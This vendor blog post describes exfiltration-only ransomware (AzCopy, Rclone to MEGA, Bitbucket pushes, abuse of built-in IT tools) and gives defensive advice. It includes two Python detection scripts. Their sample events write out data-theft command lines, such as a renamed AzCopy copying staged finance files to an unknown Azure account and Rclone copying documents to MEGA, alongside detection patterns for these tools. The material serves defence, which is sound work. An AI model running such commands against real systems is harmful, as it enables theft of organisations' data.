
Ransomware Without Encryption: Why Pure Exfiltration Attacks Are Surging—and Why They’re So Hard to Catch 

Brad LaPorte
01 Jan 2026
5 min read
Ransomware

In Morphisec’s recent CTO Briefing: The State of Ransomware, CTO Michael Gorelik highlighted one of the most significant and troubling shifts in the ransomware landscape: many ransomware attacks no longer involve encryption at all.   

Instead, attackers quietly steal sensitive data, sometimes over weeks or months, and then extort victims long after the breach. This “ransomware without encryption” model is growing rapidly because it carries lower risk for attackers, is harder for defenders to detect, and is nearly impossible for victims to investigate once logs have aged out.   


A New Kind of Ransomware Attack—Without the Ransomware 

Traditional ransomware relies on encryption. The exfiltration-only model relies on techniques that are far more difficult to detect:   

  • Stealthy data exfiltration 
  • Minimal malware footprint 
  • Abuse of trusted tools and cloud services 
  • Delayed extortion designed to prevent forensic tracing   

In the briefing, Michael explained that attackers no longer need noisy encryption tools to put organizations into crisis. Exfiltration-only attacks eliminate much of the risk—and technical complexity—of encrypting systems. They also make defenders less certain about what was stolen, when, and how.   

Here’s why attackers are shifting to pure exfiltration: 

  • Encryption is noisy; exfiltration can be silent 
  • EDR tools are weaker at data-theft detection than malware prevention 
  • The ransom is still effective; victims fear regulatory fallout 
  • Negotiations favor attackers because evidence is scarce 
  • Many organizations can restore systems, but not stolen data  

The result? Victims still pay—even without encryption, a trend discussed both in the briefing and in Morphisec’s blog Why Ransomware Victims Still Pay.   

How Modern Exfiltration-Only Attacks Work 

The CTO briefing revealed several real-world techniques attackers used recently against organizations protected by leading EDR tools. Many of these attacks went undetected for weeks.   

1. Azure Copy Exfiltration 

One of the most concerning patterns: attackers increasingly use Azure Copy (Microsoft's AzCopy command-line tool for moving data into Azure Storage) to blend data theft with normal cloud operations. 

Because many organizations already use Azure for backup or storage, data movement to Azure endpoints (*.blob.core.windows.net) often doesn't trigger alerts. The distinguishing signal is the destination storage account, which in these incidents belongs to the attacker rather than to the organization, so egress monitoring has to look at the account name in the URL, not just at the Azure domain. 

Michael noted that in numerous Q3 and Q4 incidents, AzCopy was the primary data exfiltration mechanism, chosen specifically because it hides in plain sight. 

This trend is also echoed in Morphisec’s published analysis of recent ransomware campaigns. 

  

2. RClone, Mega, and Bitbucket Tunnels 

Attackers frequently use: 

  • Rclone, a command-line sync tool that speaks to dozens of cloud storage backends 
  • Uploads to MEGA (mega.nz) 
  • Pushes to Bitbucket repositories 
  • Custom cloud sync scripts   

These tools mimic legitimate backup traffic: TLS sessions to well-known cloud endpoints. Unless defenders have deep network visibility, at a minimum per-host outbound volume broken down by destination, these flows go unnoticed. 

  

3. Abuse of Legitimate IT Tools 

Data theft often involves tools already present in the environment. 

Michael highlighted cases where attackers used: 

  • Advanced IP Scanner 
  • Zenmap (the Nmap GUI) 
  • PowerShell 
  • RoboCopy 
  • Node.js portable modules 

Because these tools are normal in IT workflows, they blend in: typically the scanners map the network, RoboCopy collects files into a staging directory, and scripts move them out. Modern ransomware relies less on malware and more on abusing legitimate tools already inside your environment. 
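The three techniques above (AzCopy, Rclone/MEGA/Bitbucket, and staging with built-in tools) share one property: the binaries are legitimate, so the detection has to come from context. The following is an added example, not Morphisec's code or anything from the briefing. It scores constructed Sysmon-style process-creation records by matching the tool on its PE OriginalFileName (so a renamed azcopy.exe still matches), looking for cloud destinations in the command line, downgrading transfers to an assumed allowlist of approved backup hosts and storage accounts, and noting when a RoboCopy run on the same host preceded the transfer. Host names, the allowlist, and every event are assumptions made up for the example.

```python
"""Score Windows process-creation events for data-exfiltration tooling.

Added example, not Morphisec's code. Input records mimic Sysmon Event ID 1
(process creation) reduced to the fields the logic needs; every event below is
constructed for illustration, and the allowlist is an assumed site policy.
"""
import re
from datetime import datetime, timedelta

# Tools named in the briefing, keyed by PE OriginalFileName so a renamed copy
# (azcopy.exe dropped as C:\Windows\Temp\svchost.exe) still matches.
EXFIL_TOOLS = {"azcopy.exe": "AzCopy", "rclone.exe": "Rclone",
               "megacmd.exe": "MEGAcmd", "megasync.exe": "MEGAsync"}
# Normal IT/developer tools that only matter when paired with a cloud destination.
STAGING_TOOLS = {"robocopy.exe", "powershell.exe", "pwsh.exe", "node.exe", "git.exe"}
CLOUD_TARGETS = [
    (re.compile(r"https?://[\w.-]+\.blob\.core\.windows\.net/", re.I), "Azure Blob Storage"),
    (re.compile(r"[?&]sig=[A-Za-z0-9%+/=]{20,}"), "Azure SAS token"),
    (re.compile(r"\bmega\.(co\.)?nz\b|\bmega:\S*", re.I), "MEGA"),
    (re.compile(r"\bbitbucket\.org\b", re.I), "Bitbucket"),
]
TRANSFER_VERB = re.compile(r"\b(copy|sync|move|cp|put|upload|push)\b", re.I)
BLOB_HOST = re.compile(r"https?://([\w.-]+\.blob\.core\.windows\.net)", re.I)
# Assumed site policy: (host, storage account) pairs that legitimately push backups.
APPROVED_BACKUPS = {("BK02", "corpbackup.blob.core.windows.net")}


def score_event(ev):
    """Return (severity, reason) for one event, or None when it looks benign."""
    image_name = ev["Image"].rsplit("\\", 1)[-1].lower()
    original = ev.get("OriginalFileName", "").lower()
    cmd = ev["CommandLine"]
    tool = EXFIL_TOOLS.get(original) or EXFIL_TOOLS.get(image_name)
    targets = [label for pat, label in CLOUD_TARGETS if pat.search(cmd)]
    if tool:
        renamed = original in EXFIL_TOOLS and image_name != original
        if targets or renamed or TRANSFER_VERB.search(cmd):
            blob = BLOB_HOST.search(cmd)
            if blob and not renamed and (ev["Computer"], blob.group(1).lower()) in APPROVED_BACKUPS:
                return "info", f"{tool} to approved backup account {blob.group(1)}"
            detail = "renamed binary; " if renamed else ""
            return "high", f"{tool} ({detail}targets: {', '.join(targets) or 'none parsed'})"
        return "medium", f"{tool} executed without a transfer command"
    if image_name in STAGING_TOOLS and targets:
        return "medium", f"{image_name} reaching {', '.join(targets)}"
    return None


def analyze(events, window=timedelta(hours=1)):
    """Score every event; note RoboCopy staging shortly before an exfil tool on the same host."""
    findings, last_staging = [], {}
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        t = datetime.fromisoformat(ev["UtcTime"])
        name = ev["Image"].rsplit("\\", 1)[-1].lower()
        if name == "robocopy.exe":
            last_staging[ev["Computer"]] = t
        scored = score_event(ev)
        if scored is None:
            continue
        sev, why = scored
        staged = last_staging.get(ev["Computer"])
        if sev == "high" and staged and name != "robocopy.exe" and t - staged <= window:
            why += f"; RoboCopy staging {int((t - staged).total_seconds() // 60)} min earlier"
        findings.append({"host": ev["Computer"], "time": ev["UtcTime"],
                         "severity": sev, "reason": why, "cmd": ev["CommandLine"]})
    return findings


def sample_events():
    """Constructed events: one staged AzCopy theft, one Rclone-to-MEGA, one git push, one real backup."""
    sas = "?sv=2023-11-03&ss=b&sig=Ab3%2Fxyz9876543210QWERTYUIOPasdfgh"
    return [
        {"UtcTime": "2025-11-03T10:05:00", "Computer": "FS01", "Image": r"C:\Windows\System32\Robocopy.exe",
         "OriginalFileName": "robocopy.exe",
         "CommandLine": r'robocopy "C:\Shares\Finance" "C:\ProgramData\tmp\f" /E /R:0 /NP'},
        {"UtcTime": "2025-11-03T10:40:00", "Computer": "FS01", "Image": r"C:\Windows\Temp\svchost.exe",
         "OriginalFileName": "azcopy.exe",
         "CommandLine": rf'svchost.exe copy "C:\ProgramData\tmp\f" "https://stor8.blob.core.windows.net/bk{sas}" --recursive'},
        {"UtcTime": "2025-11-03T11:02:00", "Computer": "WS17", "Image": r"C:\Users\j\AppData\Local\rclone.exe",
         "OriginalFileName": "rclone.exe",
         "CommandLine": r"rclone.exe copy C:\Users\j\Documents mega:docs --transfers 16"},
        {"UtcTime": "2025-11-03T11:30:00", "Computer": "DEV04", "Image": r"C:\Program Files\Git\cmd\git.exe",
         "OriginalFileName": "git.exe",
         "CommandLine": "git.exe push https://bitbucket.org/acme/app.git main"},
        {"UtcTime": "2025-11-03T23:00:00", "Computer": "BK02", "Image": r"C:\Tools\azcopy.exe",
         "OriginalFileName": "azcopy.exe",
         "CommandLine": rf'azcopy.exe copy "D:\Backups\2025-11-03" "https://corpbackup.blob.core.windows.net/nightly{sas}" --recursive'},
        {"UtcTime": "2025-11-03T09:00:00", "Computer": "WS22",
         "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "OriginalFileName": "PowerShell.EXE",
         "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
    ]


if __name__ == "__main__":
    for f in analyze(sample_events()):
        print(f'{f["time"]} {f["host"]:5} {f["severity"]:6} {f["reason"]}')
```

Running it yields one high finding for FS01 (renamed AzCopy to an unknown storage account, 35 minutes after a RoboCopy staging run), one high for the Rclone push to MEGA, a medium for the Bitbucket push from a developer host, and only an informational line for the nightly backup from the allowlisted host. The allowlist is what keeps the rule usable in an environment that really does back up to Azure; without it every legitimate AzCopy run would page the SOC and the rule would be tuned out.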

  

4. Zero Encryption, Zero Alerting 

Without encryption, the signals most ransomware detections key on are absent: 

  • No encryption-specific process behavior, such as mass file rewrites 
  • No noisy file renaming 
  • No CPU usage spike 
  • No filesystem write triggers: collection is reads and copies, not modifications 

This lets attackers steal data months before they notify victims, which they do by email, encrypted message, or even physical mail, as Michael described.   

Why These Attacks Are So Dangerous for CISOs

 Michael underscored a painful truth in the briefing: “When attackers only exfiltrate data, most organizations can’t determine what was stolen—or whether it was stolen at all.”   

  1. Forensics become nearly impossible 
    Logs age out. Cloud storage events blend with normal usage. And without encryption events, there is no obvious moment of impact to anchor the timeline on. 
  2. Victims often cannot disprove attacker claims 
    Attackers know this. Fake exfiltration campaigns are increasing because organizations can’t validate or disprove threats. 
  3. Regulatory exposure is severe 
    HIPAA, GDPR, PCI-DSS, SEC cyber rules: none of them turn on whether the attacker encrypted anything. If regulated data was accessed or taken, you may need to report it. 
  4. Backups offer no protection 
    Backups restore systems; they can’t un-leak stolen data. 

 In Morphisec’s Why Ransomware Victims Still Pay analysis, reputation and compliance fears were major drivers behind ransom payments—even without encryption.   

What CISOs Can Do: Lessons from the CTO Briefing 

Michael offered several practical recommendations during the briefing: 

  1. Shift from detection to preemptive defense — You cannot detect what blends in with normal behavior. You can prevent attackers from gaining stable footholds in the first place.
  2. Increase visibility into outbound data flows — Especially cloud services and third-party sync tools. Baseline each host's normal egress volume and alert on new storage destinations, not just on known-bad domains. 
  3. Harden identity, MFA, and remote access paths — Exfiltration attacks often start with a single compromised account. 
  4. Validate exfiltration claims before responding — Attackers increasingly bluff. An IR team must confirm evidence before ransom negotiations begin. 
  5. Protect non-agent assets — Gateways, NAS appliances, and backup servers are often the origin of exfiltration paths. 
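Recommendation 2 above is the one that catches the Azure, Rclone and MEGA flows described earlier, and it works even on NAS appliances and gateways that cannot run an agent (recommendation 5), because it only needs proxy or flow records. The following is an added example, not Morphisec's code. It aggregates constructed egress rows (day, source host, destination domain, bytes sent), computes each host's median daily egress over prior days, and flags a host when today's volume spikes past that baseline or when a sizeable amount goes to a destination the host has never talked to before. The storage-domain suffix list, the thresholds, the host names and every row are assumptions for the example.

```python
"""Baseline outbound volume per host and flag spikes or first-seen destinations.

Added example (not Morphisec's code). Rows mimic a proxy/NetFlow export reduced
to day, source host, destination domain and bytes sent; every row below is
constructed. Thresholds and the domain list are assumptions a SOC would tune.
"""
from collections import defaultdict
from statistics import median

# Storage/collaboration domains named in the briefing plus the Azure blob suffix.
# Matching is by suffix so a new account such as stor8.blob.core.windows.net counts.
CLOUD_STORAGE_SUFFIXES = ("blob.core.windows.net", "mega.nz", "mega.co.nz", "bitbucket.org")
SPIKE_RATIO = 5.0                # today's egress vs. median of prior days
SPIKE_MIN_BYTES = 1 << 30        # 1 GiB; below this a ratio alone is noise
NEW_DEST_MIN_BYTES = 100 << 20   # 100 MiB to a destination never seen before


def is_cloud_storage(domain):
    return any(domain == s or domain.endswith("." + s) for s in CLOUD_STORAGE_SUFFIXES)


def aggregate(rows):
    """Sum bytes into {host: {day: {domain: bytes}}}."""
    agg = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
    for day, host, domain, nbytes in rows:
        agg[host][day][domain] += nbytes
    return agg


def find_anomalies(rows, day):
    """Return one alert per host whose egress on `day` breaks its own baseline."""
    alerts = []
    for host, per_day in aggregate(rows).items():
        today = per_day.get(day)
        if not today:
            continue
        prior_days = [d for d in per_day if d < day]          # ISO dates sort as strings
        prior_totals = [sum(per_day[d].values()) for d in prior_days]
        seen_before = {dom for d in prior_days for dom in per_day[d]}
        total = sum(today.values())
        baseline = median(prior_totals) if prior_totals else 0
        reasons = []
        # Volume spike: a host with no history at all is treated as a spike if it moves >= 1 GiB.
        if total >= SPIKE_MIN_BYTES and (baseline == 0 or total / baseline >= SPIKE_RATIO):
            reasons.append(f"egress {total / 2**30:.1f} GiB vs median {baseline / 2**30:.2f} GiB "
                           f"over {len(prior_days)} prior days")
        # New destination: the BK02-style nightly backup never trips this because its account is known.
        for dom, b in today.items():
            if dom not in seen_before and b >= NEW_DEST_MIN_BYTES:
                tag = "cloud storage" if is_cloud_storage(dom) else "uncategorised"
                reasons.append(f"first-seen destination {dom} ({tag}) received {b / 2**20:.0f} MiB")
        if reasons:
            alerts.append({"host": host, "day": day, "bytes": total, "reasons": reasons})
    return alerts


def build_sample():
    """Constructed history: 7 quiet days, then one day with a file server and a workstation exfiltrating."""
    rows = []
    for d in range(1, 8):
        day = f"2025-11-{d:02d}"
        rows += [(day, "FS01", "wsus.corp.example", 180 << 20),
                 (day, "FS01", "graph.microsoft.com", 40 << 20),
                 (day, "BK02", "corpbackup.blob.core.windows.net", 40 << 30),   # nightly backup
                 (day, "WS17", "teams.microsoft.com", 300 << 20)]
    target = "2025-11-08"
    rows += [(target, "FS01", "wsus.corp.example", 170 << 20),
             (target, "FS01", "stor8.blob.core.windows.net", 38 << 30),       # never seen before
             (target, "BK02", "corpbackup.blob.core.windows.net", 41 << 30),  # normal nightly backup
             (target, "WS17", "teams.microsoft.com", 280 << 20),
             (target, "WS17", "g.api.mega.co.nz", 2560 << 20)]                # 2.5 GiB to MEGA
    return rows, target


if __name__ == "__main__":
    rows, day = build_sample()
    for a in find_anomalies(rows, day):
        print(a["host"], "|", " | ".join(a["reasons"]))
```

FS01 and WS17 are flagged on both tests, while BK02 moving 41 GiB to its usual storage account is not, which is the point: volume alone cannot separate a backup server from a compromised file server, but volume relative to the host's own history combined with first-seen destinations can. The weak spot a practitioner should keep in mind is an attacker who throttles to stay under both thresholds over many days; the "first-seen destination" check still fires on the first day the new account appears, as long as retention keeps enough history to know what "seen before" means.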

Exfiltration Is the New Front Line of Ransomware   

Encryption may be optional now—but extortion is not.  

Attackers have discovered a quieter, more effective model that largely bypasses detection tools built around encryption behavior. By stealing data instead of encrypting it, ransomware groups reduce their risk while increasing pressure on their victims.   

See how attackers are shifting to exfiltration-only attacks, and how preemptive cyber defense stops them before they begin. The full breakdown of these evolving attack chains, including recent case studies, emerging ransomware group tactics, and predictions for 2026, is covered in detail in Morphisec’s CTO Briefing: The State of Ransomware – Exec Report, available for download.


About the author

Brad LaPorte

Chief Marketing Officer

Brad LaPorte is a seasoned cybersecurity expert and former military officer specializing in cybersecurity and military intelligence for the United States military and allied forces. With a distinguished career at Gartner as a top-rated research analyst, Brad was instrumental in establishing key industry categories such as Attack Surface Management (ASM), Extended Detection & Response (XDR), Digital Risk Protection (DRP), and the foundational elements of Continuous Threat Exposure Management (CTEM). His forward-thinking approach led to the inception of Secureworks’ MDR service and the EDR product Red Cloak, both industry firsts. At IBM, he spearheaded the creation of the Endpoint Security Portfolio, as well as MDR, Vulnerability Management, Threat Intelligence, and Managed SIEM offerings, further solidifying his reputation as a visionary in cybersecurity solutions years ahead of their time.
